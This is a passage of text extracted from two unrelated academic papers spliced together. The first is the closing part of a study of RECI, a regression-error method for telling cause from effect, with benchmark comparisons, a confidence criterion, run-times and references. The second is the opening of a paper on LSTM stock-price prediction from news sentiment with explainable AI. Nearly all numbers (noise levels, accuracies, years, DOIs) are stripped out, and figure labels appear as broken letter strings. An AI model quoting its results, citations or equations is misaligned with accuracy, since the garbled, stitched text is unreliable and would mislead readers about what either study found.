(x) invertible s (c) u( , ) x non-invertible rescale(c,− , ) n( ,σ ) exp(x) rescale(c,− , ) n( . ,σ ) s (x) sin(rescale(c,− ·π, ·π)) n( ,σ ) gm[ . , . ]t,[ . , . ]t . . . . . . . . a c c u ra c y reci anm igci lingam slope pnl . . . . . . . . a c c u ra c y reci anm igci lingam slope pnl (a) linear (b) invertible . . . . . . . . a c c u ra c y reci anm igci lingam slope pnl (c) non-invertible figure evaluation results of all methods in the (a) linear, (b) invertible and (c) non-invertible data sets. the parameter α controls the amount of noise in the data. full-size doi: . /peerjcs. /fig- linear: as expected, anm, pnl, slope, igci and reci perform very poorly, since they require nonlinear data. in case of reci, theorem states an equality of the mse if the func- tional relation is linear and, thus, the causal direction can not be inferred. while lingam performs well for α= . , and probably for smaller values of α too, the performance blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. drops if α increases. the poor performances of lingam and anm can also be explained by the violation of its core assumption of an independence between cause and input. invertible: in this data set, igci performs quite well for small α, since all assumptions approximately hold, but the performance decreases when the noise becomes stronger and violates the assumption of a deterministic relation. in case of reci, we made a similar observation, but it performs much better than igci if α< . . 
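The generation scheme just listed can be condensed into a short script. The sketch below is our illustration rather than the original generation code: the source distributions and the functions f1 to f4 are concrete stand-ins for the random draws described in table , the number of mixture terms in the gaussian-cdf construction is an arbitrary default (the value of n was lost in extraction), and φ is taken from the invertible case; α again controls the noise level.

# condensed sketch of the dependent-noise cause-effect pair generation (our illustration)
import numpy as np
from scipy.stats import norm

rng = np.random.default_rng(1)

def normalize(v):
    return (v - v.min()) / (v.max() - v.min())

def standardize(v):
    return (v - v.mean()) / v.std()

def mixture_of_gaussian_cdfs(c, n_terms=5):
    """random monotonically increasing phi built from gaussian cdfs, as described above."""
    b = rng.uniform(0.0, 1.0, n_terms)
    mu = rng.uniform(0.0, 1.0, n_terms)
    sigma = rng.uniform(1e-3, 0.1, n_terms)
    return sum(b[i] * norm.cdf(c, loc=mu[i], scale=sigma[i]) for i in range(n_terms))

def generate_pair(alpha, n_samples=1000):
    w1, w2 = rng.uniform(0.0, 1.0, 2)
    s1 = rng.uniform(0.0, 1.0, n_samples)
    s2 = rng.normal(0.0, 1.0, n_samples)
    s1, s2 = s1 - s1.mean(), s2 - s2.mean()            # centred hidden sources
    c_raw = w1 * s1 + (1.0 - w1) * np.exp(s2)          # f1, f2: illustrative choices
    n_raw = w2 * np.sin(s1) + (1.0 - w2) * s2          # f3, f4: illustrative choices
    c = normalize(c_raw)
    n = alpha * standardize(n_raw)                     # cause and noise share the sources
    e = mixture_of_gaussian_cdfs(c) + n                # invertible phi case
    return c, e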
aside from the assumption of linear data for lingam, the expected poor performance of lingam and anm can be explained by the violation of the independence assumption between c and n . in contrast to the previous results, pnl performs significantly better in this setting than anm, although, likewise lingam and anm, the independence assumption is violated. non-invertible: these results seem very interesting, since it supports the argument that the error asymmetry becomes even clearer if the function is not invertible due to an information loss of regressing in anticausal direction. here, igci and slope perform reasonably well, while anm and lingam perform even worse than a baseline of just guessing. comparing anm and pnl, pnl has a clear advantage, although the overall performance is only slightly around % in average. the constant results of each method can be explained by the rather simple and similar choice of data generating functions. while the cause and noise also have a dependency in the sim-c data sets, the performance gap between anm and reci is vastly greater in invertible and non-invertible than in sim-c due to a strong violation of the independent noise assumption. therefore, reci might perform better than anm in cases with a strong dependency between cause and noise. real-world data in real-world data, the true causal relationship generally requires expert knowledge and can still remain unclear in cases where randomized controlled experiments are not possible. for our evaluations, we considered the commonly used cause–effect pairs (cep) benchmark data sets for inferring the causal direction in a bivariate setting. these benchmark data sets provided, at the time of these evaluations, data sets with given cause and effect variables and can be found on https://webdav.tuebingen.mpg.de/cause-effect/. however, since we only consider a two variable problem, we omit six multivariate data sets, which leaves data sets for the evaluations. these data sets consist of a wide range of different scenarios, such as data from time dependent and independent physical processes, sociological and demographic studies or biological and medical observations. an extensive analysis and discussion about the causal relationship of the first data sets can be found in the work by mooij et al. ( ). each data set comes with a corresponding weight determined by expert knowledge. this is because several data sets are too similar to consider them as independent examples, hence they get lower weights. therefore, the weight wm in eq. ( ) depends on the corresponding data set. the evaluation setup is the same as for the artificial data sets, but we doubled the number of internal repetition of cure to eight times in order to provide the same conditions as in sgouritsa et al. ( ). figures a and b shows the results of the evaluations in the original and preprocessed data, respectively. in all cases, slope and reci perform significantly better than anm, blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://webdav.tuebingen.mpg.de/cause-effect/ http://dx.doi.org/ . /peerj-cs. the work of mooij et al. ( ) provides further evaluations of anm and igci in the original cep data set with parameter configurations that reached slightly higher accuracies than the presented results in this work. regarding cure, we had to use a simplified implementation due to the high computational cost, which did not perform as well as the results reported in sgouritsa et al. ( ). 
algorithm and algorithm are equivalent if t = . a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y (a) original cep (b) preprocessed cep figure evaluation results of all methods in the real-world cep data sets. (a) shows the result of the evaluations in the original data and (b) the results in the preprocessed versions where low-density points were removed. full-size doi: . /peerjcs. /fig- pnl, igci, cure and lingam. while slope performs slightly better in the original data sets than reci, reci performs better overall in the preprocessed data . further, the performance gap even increases in the preprocessed data with removed low-density points. surprisingly, as table in the supplements indicates, the simple shifted monomial function ax +c performs the best, even though it is very unlikely that this function is able to capture the true function φ. we obtained similar observations in the artificial data sets, where the simple logistic function oftentimes performs the best. in order to show that reci still performs reasonably well under a different scaling, we also evaluated reci in the real-world data set with standardized data. these results can be found summarized in figures (a)– (b) in the supplements and more detailed in table and table in the supplements. while standardizing the data improves the performance in the sim-g data, it slightly decreases the performance in the real-world data as compared to a normalization of the data, but still performs reasonably well. this shows some robustness with respect to a different scaling. error ratio as rejection criterion it is not clear how a confidence measure for the decision of reci can be defined. however, since theorem states that the correct causal direction has a smaller error, we evaluated the idea of utilizing the error ratio for a confidence measure in terms of: confidence= − min(e[var[x|y]],e[var[y |x]]) max(e[var[x|y]],e[var[y |x]]) , ( ) the idea is that, the smaller the error ratio, the higher the confidence of the decision, due to the large error difference. note that we formulated the ratio inverse to theorem in order to get a value on [ , ]. algorithm can be modified in a straight forward manner to utilize this confidence measure. the modification is summarized in algorithm . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm causal inference algorithm that uses eq. ( ) as rejection criterion. function reci(x, y , t) fx and y are the observed data and t ∈[ , ] is the confidence threshold for rejecting a decision. (x,y )←rescaledata(x,y ) f ←fitmodel(x,y ) ffit regression model f : x →y g ←fitmodel(y,x) ffit regression model g : y →x msey |x ←meansquarederror(f ,x,y ) msex|y ←meansquarederror(g,y,x) ξ ← − min(msex|y ,msey |x )max(msex|y ,msey |x ) if ξ ≥ t then if msey |x <msex|y then return x causes y else return y causes x end if else return no decision end if end function we re-evaluated the obtained results by considering only data sets where algorithm returns a decision with respect to a certain confidence threshold. figs. 
a– d show some examples of the performance of reci if we use eq. ( ) to rank the confidence of the decisions. a decision rate of %, for instance, indicates the performance when we only force a decision on % of the data sets with the highest confidence. in this sense, we can get an idea of how useful the error ratio is as rejection criterion. while figs. a, c and d support the intuition that the smaller the error ratio, the higher the chance of a correct decision, fig. b has a contradictive behavior. in fig. b, it seems that a small error ratio (big error difference) is rather an indicator for an uncertain decision (probably caused by over- or underfitting issues). therefore, we can not generally conclude that eq. ( ) is a reliable confidence measure in all cases, but it seems to be a good heuristic approach in the majority of the cases. more plots can be found in the supplements, where fig. shows the plots in the original data, fig. in the preprocessed data and fig. in the standardized data. note that a deeper analysis of how to define an appropriate confidence measure for all settings is beyond the scope of this paper and we rather aim to provide some insights of utilizing the error ratio for this purpose. run-time comparison in order to have a brief overview and comparison of the run-times, we measured the execution durations of each method in the evaluation of the original cep data sets. all measures were performed with a intel xeon e - v processor. table summarizes the measured run-times, where we stopped the time measurement of cure after s. as the table indicates, igci is the fastest method, followed by lingam and reci. the blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. decision rate (%) a c c u ra c y ( % ) decision rate (%) a c c u ra c y ( % ) decision rate (%) a c c u ra c y ( % ) decision rate (%) a c c u ra c y ( % ) (a) cep-log (b) sim-log (c) sim-c-nn (d) sim-ln-poly figure the exemplary performance of reci if a certain decisions rate is forced. (a) cep-log, (b) sim-log, (c) sim-c-nn, (d) sim-ln-poly. here, the decisions are ranked according to the confidence measure defined in eq. ( ). full-size doi: . /peerjcs. /fig- table the average run-time in seconds of each method using all cep data sets. method time (s) anm-hsic . ± . anm-ent . ± anm-fn . ± . pnl . ± . slope . ± . igci-u . ± . igci-u . ± . igci-u . ± . igci-g . ± . igci-g . ± . igci-g . ± . cure > lingam . ± . reci-log . ± . reci-mon . ± . reci-poly . ± . reci-svr . ± . reci-nn . ± . ranking of anm, pnl, slope and reci is not surprising; anm and pnl need to evaluate the independence between input and residual on top of fitting a model. in case of slope, multiple regression models need to be fitted depending on a certain criterion that requires to be evaluated. therefore, by construction, reci can be expected to be faster than anm, pnl and slope. discussion due to the greatly varying behavior and the choice of various optimization parameters, a clear rule of which regression function is the best choice for reci remains an unclear and difficult problem. overall, it seems that simple functions are better in capturing the error asymmetries than complex models. however, a clear explanation for this is still lacking. a possible reason for this might be that simple functions in causal direction already achieve blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
a small error, while in anticausal direction, more complex models are required to achieve a small error. to justify speculative remarks of this kind raises deep questions about the foundations of causal inference. according to eq. ( ), it is possible to conclude that the joint distribution has a simpler description in causal direction than in anticausal direction. seeing this, a model selection based on the regression performance and model complexity considered in a dependent manner might further improve reci’s practical applicability. regarding the removal of low-density points, the performance of methods that are based on the gaussiantiy assumption, such as fn and igci with gaussian reference measure, seems not to be influenced by the removal. on the other hand, the performance of hsic, ent, and igci with uniform measure is negatively affected, while the performance of lingam and reci increases. in case of reci, this can be explained by a better estimation of the true mse with respect to the regression function class. regarding the computational cost, we want to emphasize again that reci, depending on the implementation details, can have a significantly lower computational cost than anm, slope and cure, while providing comparable or even better results. further, it can be easily implemented and applied. conclusion we presented an approach for causal inference based on an asymmetry in the prediction error. under the assumption of an independence among the data generating function, the noise, and the distribution of the cause, we proved (in the limit of small noise) that the conditional variance of predicting the cause by the effect is greater than the conditional variance of predicting the effect by the cause. for instance, in the example shown in fig. , the regression error in the true causal direction is smaller than the error in the anticausal direction. in our work, the additive noise is not assumed to be independent of the cause (in contrast to so-called additive noise models). the stated theorem might also be interesting for other statistical applications. we proposed an easily implementable and applicable algorithm, which we call reci, that exploits this asymmetry for causal inference. the evaluations show supporting results and leave room for further improvements. by construction, the performance of reci depends on the regression method. according to our limited experience so far, regression with simple model classes (that tend to underfit the data) performs reasonably well. to clarify whether this happens because the conditional distributions tend to be simpler—in a certain sense—in causal direction than in anticausal direction has to be left for the future. additional information and declarations funding this work was supported by jst crest grant number jpmjcr and jsps kakenhi grant number jp k , japan. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: st crest: jpmjcr . jsps kakenhi: jp k . competing interests the authors declare there are no competing interests. 
author contributions • patrick blöbaum conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • dominik janzing and takashi washio conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • shohei shimizu and bernhard schölkopf conceived and designed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: real-world data can be found at: https://webdav.tuebingen.mpg.de/cause-effect/ artificial data can be found at: http://jmlr.org/papers/v / - .html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references blöbaum p, janzing d, washio t, shimizu s, schölkopf b. . cause-effect inference by comparing regression errors. in: proceedings of the st international conference on artificial intelligence and statistics (aistats ). blöbaum p, shimizu s, washio t. . a novel principle for causal inference in data with small error variance. in: european symposium on artificial neural networks. louvain-la-neuve, belgium: i doc, – . blöbaum p, washio t, shimizu s. . error asymmetry in causal and anticausal regression. behaviormetrika ( ): – . comley jw, dowe dl. . general bayesian networks and asymmetric languages. in: proceedings of the second hawaii international conference on statistics and related fields. daniušis p, janzing d, mooij j, zscheischler j, steudel b, zhang k, schölkopf b. . inferring deterministic causal relations. in: proceedings of the th conference on uncertainty in artificial intelligence. corvallis: auai press, – . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://webdav.tuebingen.mpg.de/cause-effect/ http://jmlr.org/papers/v / - .html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. hoyer p, janzing d, mooij j, peters j, schölkopf b. . nonlinear causal discovery with additive noise models. in: advances in neural information processing systems . red hook: curran associates, inc., – . hyvärinen a, smith s. . pairwise likelihood ratios for estimation of non-gaussian structural equation models. journal of machine learning research (jan): – . janzing d, mooij j, zhang k, lemeire j, zscheischler j, daniušis p, steudel b, schölkopf b. . information-geometric approach to inferring causal directions. artificial intelligence : – doi . /j.artint. . . . janzing d, schölkopf b. . causal inference using the algorithmic markov condition. ieee transactions on information theory ( ): – doi . /tit. . . janzing d, sun x, schölkopf b. . distinguishing cause and effect via second order exponential models. eprint http://arxiv.org/abs/ . . kano y, shimizu s. . causal inference using nonnormality. in: proceedings of the international symposium on science of modeling, the th anniversary of the information criterion. tokyo, – . lemeire j, janzing d. . replacing causal faithfulness with algorithmic independence of conditionals. minds and machines ( ): – doi . /s - - - . ma s, statnikov a. . 
methods for computational causal discovery in biomedicine. behaviormetrika ( ): – doi . /s - - - . marx a, vreeken j. . telling cause from effect using mdl-based local and global re- gression. in: ieee international conference on data mining (icdm). piscataway: ieee, – doi . /icdm. . . mooij j, peters j, janzing d, zscheischler j, schölkopf b. . distinguishing cause from effect using observational data: methods and benchmarks. journal of machine learning research ( ): – . pearl j. . causality: models, reasoning and inference. nd edition. new york: cambridge university press. peters j, janzing d, schölkopf b. . causal inference on discrete data using additive noise models. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . peters j, janzing d, schölkopf b. . elements of causal inference—foundations and learning algorithms. cambridge: mit press. rissanen j. . modeling by shortest data description. automatica ( ): – doi . / - ( ) - . rosner f. . the ethics of randomized clinical trials. the american journal of medicine ( ): – doi . / - ( ) - . schölkopf b, janzing d, peters j, sgouritsa e, zhang k, mooij j. . semi-supervised learning in causal and anticausal settings. in: schölkopf b, luo z, vovk v, eds. empirical inference. festschrift in honor of vladimir vapnik, berlin, heidelberg: springer-verlag, – doi . / - - - - _ . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . /tit. . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /icdm. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. sgouritsa e, janzing d, hennig p, schölkopf b. . inference of cause and effect with unsupervised inverse regression. in: artificial intelligence and statistics. san diego: pmlr, – . shimizu s, hoyer p, hyvärinen a, kerminen a. . a linear non-gaussian acyclic model for causal discovery. journal of machine learning research : – . spirtes p, glymour c, scheines r. . causation, prediction, and search. cambridge: mit press. statnikov a, henaff m, lytkin ni, aliferis cf. . new methods for separating causes from effects in genomics data. bmc genomics ( ):s doi . / - - -s -s . sun x, janzing d, schölkopf b. . causal inference by choosing graphs with most plausible markov kernels. in: proceedings of the th international symposium on artificial intelligence and mathematics. fort lauderdale, fl, – . zhang k, hyvärinen a. . on the identifiability of the post-nonlinear causal model. in: proceedings of the th conference on uncertainty in artificial intelligence. arlington: auai press, – . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /peerj-cs. submitted august accepted november published january corresponding authors hrituja khatavkar, hrituja.khatavkar@sitpune.edu.in ketan kotecha, head@scaai.siu.edu.in academic editor rajanikanth aluvalu additional information and declarations can be found on page doi . /peerj-cs. copyright gite et al. distributed under creative commons cc-by . 
open access explainable stock prices prediction from financial news articles using sentiment analysis shilpa gite , hrituja khatavkar , ketan kotecha , shilpi srivastava , priyam maheshwari and neerav pandey symbiosis institute of technology, symbiosis international (deemed university), pune, maharashtra, india symbiosis center for applied artificial intelligence (scaai), symbiosis international (deemed university), pune, maharashtra, india abstract the stock market is very complex and volatile. it is impacted by positive and negative sentiments which are based on media releases. the scope of the stock price analysis relies upon ability to recognise the stock movements. it is based on technical fundamentals and understanding the hidden trends which the market follows. stock price prediction has consistently been an extremely dynamic field of exploration and research work. however, arriving at the ideal degree of precision is still an enticing challenge. in this paper, we are proposing a combined effort of using efficient machine learning techniques coupled with a deep learning technique—long short term memory (lstm)—to use them to predict the stock prices with a high level of accuracy. sentiments derived by users from news headlines have a tremendous effect on the buying and selling patterns of the traders as they easily get influenced by what they read. hence, fusing one more dimension of sentiments along with technical analysis should improve the prediction accuracy. lstm networks have proved to be a very useful tool to learn and predict temporal data having long term dependencies. in our work, the lstm model uses historical stock data along with sentiments from news items to create a better predictive model. subjects artificial intelligence, data mining and machine learning keywords long short-term memory (lstm), explainable ai(xai), stock price prediction, deep learning introduction stock market investment/trading can be very tricky and stressful but rewarding if predicted correctly. it has been an object of study for the past many decades and is a complex task because of the large number of parameters, disordered information, and dynamism. several technical indicators and sources of information affect the stock prices, but due to the substantial amount of data present, it becomes difficult to predict the prices. however, with the advancement in technology, particularly in processing large chunks of temporal data, the field is continuously improving to achieve better prediction accuracy. there is a famous hypothesis in finance called the efficient market hypothesis, which states that asset prices cannot entirely depend on obsolete information and market prices react to new information, for example, financial news articles, social media blogs, etc (Ţiţan, how to cite this article gite s, khatavkar h, kotecha k, srivastava s, maheshwari p, pandey n. . explainable stock prices prediction from financial news articles using sentiment analysis. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:hrituja.khatavkar@sitpune.edu.in mailto:head@scaai.siu.edu.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. ). these sources change the sentiments of the investor and the traders. 
with the advancement in artificial intelligence, information coming from both financial time series, which captures sentiments and other technical analysis data, can be fused to predict stock prices. in this paper, we suggest a technique involving lstm and the interpretability power of explainable ai (xai) for visual representations to provide a definite outline that helps them anticipate their future stock prices. the data we are using is the national stock exchange (nse) and the news headlines aggregated from pulse (pulse by zerodha, ). pulse has aggregated , + indian finance news headlines from various news websites like business standard, the hindu business, reuter, and many other news websites. state-of-the-art techniques cho et al. ( ) proved that the recurrent neural network (rnn) is a powerful model for processing context information from textual data. however, to tackle long-term dependencies, the variant of rnn, lstm, has proved to be very effective in handling complex tasks for text processing and language modeling on temporal data (sherstinsky, ). we propose using lstm for news classification for sentiments, employing the interactions of words during the compositional process. lstm incorporates a memory cell, which is a unit of computation that supersedes the traditional deep learning neurons in the network (moghar & hamiche, ; egeli, ozturan & badur, ). to understand the behavior of the proposed model, we also intend to make our model explainable. xai aims to develop a collection of machine learning techniques that produce more explainable models (doran, schulz & besold, ). using xai techniques, we wish to provide knowledge about the prediction made by the model so that the user can get insights for future trading/investment strategies. the model can be interpreted by visual tools, which can help us to consider the biases in the model before making the final decision. kalyani, bharathi & rao ( ) in their research, using supervised machine learning for classification of news headlines and additional text mining techniques to examine news polarity. the news articles with its polarity score and text converted to tf-idf vector space are fed to the classifier. three different classification algorithms (support vector machines ‘‘svm’’, naïve bayes and random forest) are implemented to investigate and enhance classification accuracy. results of all three algorithms are compared based on precision, recall, accuracy, and other model evaluation techniques. when evaluating the results of all classifiers, the svm classifier performs satisfactorily for unknown data. the random forest also showed better results when compared to the naïve bayes algorithm. finally, the relationship between news articles and stock price data are plotted. nayak, pai & pai ( ) used the historical data from obtained from yahoo finance and used two models to predict the stock trend. one model was built for the prediction of daily stock by considering all the data available daily. the second model that was built was for monthly prediction of stocks, and it considered data available every month. also, two different datasets were used for each model. a historical price dataset was used for the daily prediction model and historical data from obtained from yahoo finance is gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. used for a monthly prediction model. 
the dataset was modeled using various models like boosted decision tree, logistic regression, and support vector machine. up to % accuracy was observed using the support vector machine. vargas, lima & evsuko ( ) proposed a recurrent convolutional neural network model. it predicts intraday movements of the s&p record. the model data sources financial news headlines from the day past of the forecast day and utilizes a few specialized indicators which are extracted from the primary target. every news is processed through a two-step procedure—initially, a word vec model to create a vector to display each word, and afterward they implement the mean (average) of all the word vectors of the same title. the rcnn model uses deep learning models: cnn and rnn. the cnn model is utilized to separate rule base data from the text while the rnn-lstm model is utilized to get the context information and to interpret the stock information attributes for forecast purposes. yoo, kim & jan ( ) analyzed and assessed a portion of the current ml techniques for stock exchange prediction. after comparing various models like multivariate regression, neural networks, support vector machines, and case-based reasoning models, they inferred that neural networks offer the capacity to predict market trends accurately when contrasted with different procedures. svms and case-based reasoning are famous for predicting stock costs due to their simplicity of use and implementation. lstm lstm (long short-term memory) is an improved form of rnn. lstm models avoid the problems encountered by rnn. hochreiter & schmidhuber ( ) introduced lstms that make use of memory cells that can either forget unnecessary information or store information for more extended periods. lstms are explicitly modeled to handle tasks involving historical texts and are also able to educate themselves on long term dependencies. with the help of memory cells, they are capable of educating themselves. lstms have a chain-like structure making it easier to pass on information. the information is passed on as a state of the cell from one memory cell to another. the output of the network is modified by the state of these cells. the architecture of lstm allows for constant error flow with the help of constant, self-connected units (hochreiter & schmidhuber, ). this flow of error and states is propagated with the help of the three gates: input gate, output gate and forget gate, that each lstm memory cell block is composed of. input gates modulate the amount of new information received by a cell, forget gates determine what amount of information from the previous cell is passed on to the current cell; they determine what information is relevant and what information needs to be forgotten (kim & won, ). given below in fig. a is the structure of simple recurrent network (srn). as compared to srn, lstm-cell given in fig. b is different and has multiple gates. lstm model has two passes: • forward pass, and • backward pass gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure detailed schematic of the simple recurrent network (srn) unit (a) and a long short-term memory block (b) as used in the hidden layers of a recurrent neural network. full-size doi: . /peerjcs. /fig- forward propagation in neural networks, the storage and calculation of intermediate results in the sequence from the input layer to the output layer are called forward propagation. 
in this propagation, we work incrementally through the mechanics of a deep network with one hidden layer. it consists of the processing of weighted inputs through the activation function. forward propagation is done to get a value; we then compare this computed value with the real value to compute the error. then, in backward propagation, we calculate the derivative of the error with respect to the weights and subtract the value obtained from the value of the weight. the final step in a forward pass (vargas, lima & evsuko, ) is the comparison between the predicted and the expected output. forward propagation is calculated using the following steps:

$z^{[i]} = W^{[i]} a^{[i-1]} + b^{[i-1]}$

$g^{[i]}(z) = \sigma(z^{[i]})$

backpropagation

backpropagation (vargas, lima & evsuko, ) is analogous to calculating the delta rule for a multilayer feedforward network. backpropagation is the method used to calculate the gradient of the neural network parameters. the main aim of backpropagation is to minimize the cost function by adjusting the weights and biases of the network. the amount of adjustment to be made is determined by the gradients of the cost function with respect to those parameters. assuming we have the following functions:

$q = f(p), \qquad r = g(q), \qquad r = (g \circ f)(p)$

where the input and the output $p$, $q$, $r$ are tensors of arbitrary shapes, by using the chain rule we can compute the derivative of $r$ with respect to $p$:

$\frac{dr}{dp} = \frac{dr}{dq} \cdot \frac{dq}{dp}$

a. forward pass

let $x^t$ be the input for time $t$, $n$ be the number of lstm blocks, and $m$ the number of inputs. we then have the following weights for the lstm layer:

• input weights: $W_z, W_i, W_f, W_o \in \mathbb{R}^{n \times m}$
• recurrent weights: $R_z, R_i, R_f, R_o \in \mathbb{R}^{n \times n}$
• peephole weights: $p_i, p_f, p_o \in \mathbb{R}^{n}$
• bias weights: $b_z, b_i, b_f, b_o \in \mathbb{R}^{n}$

then the vector formulas for a vanilla lstm layer forward pass can be written as:

$\bar{z}^t = W_z x^t + R_z y^{t-1} + b_z, \qquad z^t = g(\bar{z}^t)$ (block input)
$\bar{i}^t = W_i x^t + R_i y^{t-1} + p_i \odot c^{t-1} + b_i, \qquad i^t = \sigma(\bar{i}^t)$ (input gate)
$\bar{f}^t = W_f x^t + R_f y^{t-1} + p_f \odot c^{t-1} + b_f, \qquad f^t = \sigma(\bar{f}^t)$ (forget gate)
$c^t = z^t \odot i^t + c^{t-1} \odot f^t$ (cell state)
$\bar{o}^t = W_o x^t + R_o y^{t-1} + p_o \odot c^t + b_o, \qquad o^t = \sigma(\bar{o}^t)$ (output gate)
$y^t = h(c^t) \odot o^t$ (block output)

where $\sigma$, $g$ and $h$ are pointwise non-linear activation functions. the logistic sigmoid ($\sigma(x) = 1/(1 + e^{-x})$) is employed as the gate activation function, and the hyperbolic tangent ($g(x) = h(x) = \tanh(x)$) is typically used as the block input and output activation function. pointwise multiplication of vectors is denoted by $\odot$ (greff et al., ).
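as a complement to the equations above, the following is a minimal numpy sketch of a single forward step of a vanilla lstm block with peephole connections, in the greff et al. formulation. it is illustrative only: it is not the code used for the experiments (which rely on the keras framework), and the dimensions, random initialization and toy sequence are placeholder assumptions.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def lstm_step(x_t, y_prev, c_prev, W, R, p, b):
    """One forward step of a vanilla LSTM block with peephole connections.

    W, R, p and b are dicts keyed by 'z', 'i', 'f', 'o' holding the input,
    recurrent, peephole and bias weights defined above (p has no 'z' entry).
    """
    z = np.tanh(W['z'] @ x_t + R['z'] @ y_prev + b['z'])                     # block input
    i = sigmoid(W['i'] @ x_t + R['i'] @ y_prev + p['i'] * c_prev + b['i'])   # input gate
    f = sigmoid(W['f'] @ x_t + R['f'] @ y_prev + p['f'] * c_prev + b['f'])   # forget gate
    c = z * i + c_prev * f                                                   # new cell state
    o = sigmoid(W['o'] @ x_t + R['o'] @ y_prev + p['o'] * c + b['o'])        # output gate
    y = np.tanh(c) * o                                                       # block output
    return y, c

# toy sizes (placeholders): m inputs, n LSTM blocks
m, n = 4, 3
rng = np.random.default_rng(0)
W = {k: rng.normal(size=(n, m)) for k in "zifo"}
R = {k: rng.normal(size=(n, n)) for k in "zifo"}
p = {k: rng.normal(size=n) for k in "ifo"}
b = {k: np.zeros(n) for k in "zifo"}

y, c = np.zeros(n), np.zeros(n)
for t in range(5):                      # unroll over a short random toy sequence
    y, c = lstm_step(rng.normal(size=m), y, c, W, R, p, b)
print(y)
```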
lstm networks tend to keep the context of information fed by inputs by integrating a loop that allows information to flow, in one direction i.e from one step to the following. explainable ai (xai) we want our model to output not only the prediction part but also the explanation as to why the prediction turned out that way. if our machine makes a prediction, why should the user trust the prediction made by the machine? today, machine learning and artificial intelligence(ai) are exploited to make decisions in many fields like medical, finance, and sports. there are cases where machines aren’t % accurate. so, the user should blindly trust the choice of the machine? how can the user trust ai systems that derive inferences on probable unfair grounds? to solve the problem of trust between the user and artificial intelligence, xai (saffar, ) can be employed. it gives us the reasoning for a prediction made by the model. mainly xai is employed to resolve the black box problem. this ’’black box’’ phase is interpreted by xai and explained to the users. the user cannot completely depend on the model without a clear understanding of the model and the way the output is achieved. xai provides a clear understanding of how the model achieved a certain prediction or result. xai gives a human-understandable explanation for the prediction. current models enable interpretation but leave it to the user to apply their knowledge, bias and understanding. methodology given below is a systematic representation of how the data served to the system, how the model is trained and tested. and how xai works to interpret the model. system design figure explains the overall architecture of the system. we preprocess the news headlines dataset by performing tokenization, removing stop words, and embedding it. the headlines are then normalized and sentiment analysis is performed on it to comprehend the sentiment behind each sentiment, i.e whether a particular headline has a positive or negative sentiment associated with it. we then use the preprocessed headlines to classify them. we classify them to analyze whether they produce a positive sentiment or a negative sentiment. later, this headline dataset, along with the preprocessed yahoo finance dataset, is combined to gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure system architecture of stock market prediction using lstm and xai. shows how the data is initially processed, divided into train and test set to build further predictions and evaluate the biases using xai. full-size doi: . /peerjcs. /fig- form the final dataset. then the dataset is divided into train and test dataset. the training dataset is used to build the lstm model. the test dataset to verify the results obtained after training. finally, xai is implemented using the lime tool that is used to interpret the model and understand the biases involved in the dataset. algorithm the algorithm is divided into prediction of the opening price using lstm-cnn and xai for interpreting the model. given below is the algorithm. 
